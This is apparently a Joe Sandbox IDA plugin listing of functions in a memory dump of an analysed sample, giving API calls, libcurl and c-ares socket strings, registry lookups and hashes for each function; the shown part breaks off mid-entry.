Function 0083A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0083A832

Strings

Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0083AD0A
@, xrefs: 0083A8F4
Trying %s:%d..., xrefs: 0083A7C2, 0083A7DE
cf-socket.c, xrefs: 0083A5CD, 0083A735
Local port: %hu, xrefs: 0083AF28
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0083A6CE
bind failed with errno %d: %s, xrefs: 0083B080
Name '%s' family %i resolved to '%s' family %i, xrefs: 0083ADAC
cf_socket_open() -> %d, fd=%d, xrefs: 0083A796
Local Interface %s is ip %s using address family %i, xrefs: 0083AE60
Could not set TCP_NODELAY: %s, xrefs: 0083A871
Couldn't bind to '%s' with errno %d: %s, xrefs: 0083AE1F
@, xrefs: 0083AC42
Bind to local port %d failed, trying next, xrefs: 0083AFE5
Trying [%s]:%d..., xrefs: 0083A689

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: 22d1c2ed828f0111d052f7ba501d2a633336fd16852d9f18cf5e2b811fb57830
Instruction ID: d7a4f0b3129de757f4a5dcc3d366788465123843ff108825208246e6a6637dad
Opcode Fuzzy Hash: 22d1c2ed828f0111d052f7ba501d2a633336fd16852d9f18cf5e2b811fb57830
Instruction Fuzzy Hash: EE62D071508341ABE7259B24C886BABB7E8FFD1314F044929F988D7292E771E845CBD3

Function 008C9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008C9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 008C9974
RegCloseKey.KERNELBASE(?), ref: 008C998B

Strings

sts, xrefs: 008C99A2
CARES_HOSTS, xrefs: 008C9788
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 008C993C
\hos, xrefs: 008C999A
DatabasePath, xrefs: 008C996B
#, xrefs: 008C9B9D
#, xrefs: 008C9A3F

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3677997916-4129964100
Opcode ID: 6e7860331a4477bd87ec50b80534e2ad224db1bd7a11376403ef693a90ffb7ed
Instruction ID: e6471ee1c5baaf8d2f3b307379785a121057b8d12a3a0410a788763116555028
Opcode Fuzzy Hash: 6e7860331a4477bd87ec50b80534e2ad224db1bd7a11376403ef693a90ffb7ed
Instruction Fuzzy Hash: FB3281B5904201AFEB11AB24EC46F5B76B4FF54318F08447CF94AD6262FB31E9289793

Function 00838B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00838C30
SleepEx.KERNELBASE(00000000,00000000), ref: 00838CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00838D0E

Strings

not connected yet, xrefs: 00838BDC
connected, xrefs: 00838DA7
cf-socket.c, xrefs: 00838EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 00838E78
local address %s port %d..., xrefs: 00838C7F

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 1669343778-879669977
Opcode ID: f1b391082af5d238cb3276ee5f8b2b1fe82e666f94f7a73ecfd48ecd935e5eb0
Instruction ID: 36ab3b7b7fc1179dfe29b13de39a7d57d3c4a1a42d244fccbb4fa83dd333900c
Opcode Fuzzy Hash: f1b391082af5d238cb3276ee5f8b2b1fe82e666f94f7a73ecfd48ecd935e5eb0
Instruction Fuzzy Hash: 52B1AE70604306EFDB10CF24C985BA6B7E4FF85324F148528F8598B2D2DB71E849C7A2

Function 00802F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00802FED
RegEnumKeyExA.KERNELBASE ref: 008031A5
RegCloseKey.KERNELBASE ref: 008031C0

Strings

d, xrefs: 00802FA0

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: CloseEnumOpen
String ID: d
API String ID: 1332880857-2564639436
Opcode ID: 6d1ea0639f4cc06f30429cff50d885a3634efee1e014a61fe293a33878808327
Instruction ID: 8ddb3be1d29aaa00707bb32c1c5fb2ce8cfbe9e7ce29908b0ca63eb62925c22c
Opcode Fuzzy Hash: 6d1ea0639f4cc06f30429cff50d885a3634efee1e014a61fe293a33878808327
Instruction Fuzzy Hash: E67195B49043199FDB50EF69D98479EBBF0FF84308F108869E49897341E7749A88DF92

Function 00839290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0083935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00839388

Strings

cf-socket.c, xrefs: 008392CF
Send failure: %s, xrefs: 008393FB
send(len=%zu) -> %d, err=%d, xrefs: 00839447

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: 24fd0da2bacd4903f0df4b0fc2fdad1b780b5acf86f74613942b6f786c334f5e
Instruction ID: 57f1e5ef9add23d876f1be297f3ba1045649818ea5294fd03cd6e83586904fda
Opcode Fuzzy Hash: 24fd0da2bacd4903f0df4b0fc2fdad1b780b5acf86f74613942b6f786c334f5e
Instruction Fuzzy Hash: 3851D170600305ABD711DF28C881FAAB7A5FF84314F148528FD88DB392E771E991CB91

Function 008076A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,00803D4E,00000000,?,?,008107BF), ref: 008076EB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00807712, 00807731
multi.c, xrefs: 008076DD, 008076E9
send, xrefs: 0080770B, 0080772A
SEND %s:%d send(%lu) = %ld, xrefs: 008076F8

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-3388739168
Opcode ID: 75169edbb6bb5046a4f4883ba70fddb2d2fdfca351442233030aa92e9d685fcc
Instruction ID: d4f200ea5418ef5181d1e3576883da5e62e90c4522207b35a5ea9045fc8ab64e
Opcode Fuzzy Hash: 75169edbb6bb5046a4f4883ba70fddb2d2fdfca351442233030aa92e9d685fcc
Instruction Fuzzy Hash: B31150F1D193447FE5305719AC86D37379CEBC2B68F550614FC09A7392E561AD0482F2

Function 00807770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 008077BB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 008077E2, 00807801
recv, xrefs: 008077DB, 008077FA
RECV %s:%d recv(%lu) = %ld, xrefs: 008077C8

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: 25b9621fdf9bc4e80aa8908a12d5523f4ee36e7682767c631d7d981a2f03d8ef
Instruction ID: f168a7e0da4469c50a469ae7ac5025e37fdbaf5cf82826c498e7b48df558c67b
Opcode Fuzzy Hash: 25b9621fdf9bc4e80aa8908a12d5523f4ee36e7682767c631d7d981a2f03d8ef
Instruction Fuzzy Hash: EE1150B4D193047FE1309725AC4AE37779CEBC1BA8F450629B808A33D2E550AD0481F3

Function 008075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00807619

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 0080764A, 00807669
socket, xrefs: 00807643, 00807662
FD %s:%d socket() = %d, xrefs: 0080762E

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: 011a3f280e0cdb36d29d75529a4e712407199573791f0b51b7b80ccbb2ba1715
Instruction ID: 111877d776e3aa8d0643a3f73280864a2a32a0a2a044ae59f6aa78162592f823
Opcode Fuzzy Hash: 011a3f280e0cdb36d29d75529a4e712407199573791f0b51b7b80ccbb2ba1715
Instruction Fuzzy Hash: CD114C72E012117BE631573DBC56F4B3B88EF81734F850621F414E62E2E212D958C2E2

Function 0083A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 0083A1C6

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 0083A23B
getsockname() failed with errno %d: %s, xrefs: 0083A1F0

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3358416759-2605427207
Opcode ID: 713deb79ef0ef571c47870ecfc6a24a9946296d8cf1308af3298f63bb4a57c46
Instruction ID: 13d2675f6667d3f6c6504d27dea504b427cf30f077809691b0c7157ad9d039e7
Opcode Fuzzy Hash: 713deb79ef0ef571c47870ecfc6a24a9946296d8cf1308af3298f63bb4a57c46
Instruction Fuzzy Hash: DF21D871808784BAE7259B19DC42FE773ACEF91324F040655F99893151FE32698987E3

Function 0081D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 0081D65A

Strings

iphlpapi.dll, xrefs: 0081D5F0
if_nametoindex, xrefs: 0081D606

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000001267000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173965637.0000000001268000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174104552.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174123268.000000000141E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_sYPORwmgwQ.jbxd

Similarity

API ID: Startup
String ID: if_nametoindex$iphlpapi.dll
API String ID: 724789610-3097795196
Opcode ID: 10df36e0d0618e6db346e671566019275149663654bac88a9494d23c7ec80433
Instruction ID: c2896cdc4d3b55ef046d81509624a7c88569a9f37b233a7a33fc39e8b5492883
Opcode Fuzzy Hash: 10df36e0d0618e6db346e671566019275149663654bac88a9494d23c7ec80433
Instruction Fuzzy Hash: BE01F7D09453414BE7117B3CAD173A52698EF62304F852469E848E11A6F669C59CC2A3

Function 008CAA30 Relevance: 4.9, APIs: 3, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(FFFFFFFF,?,00000000), ref: 008CAB9B
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 008CABE3

Memory Dump Source

Source File: 00000000.00000002.2173078240.0000000000801000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2173060568.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173078240.0000000000ED9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173612156.0000000000EDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173630606.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
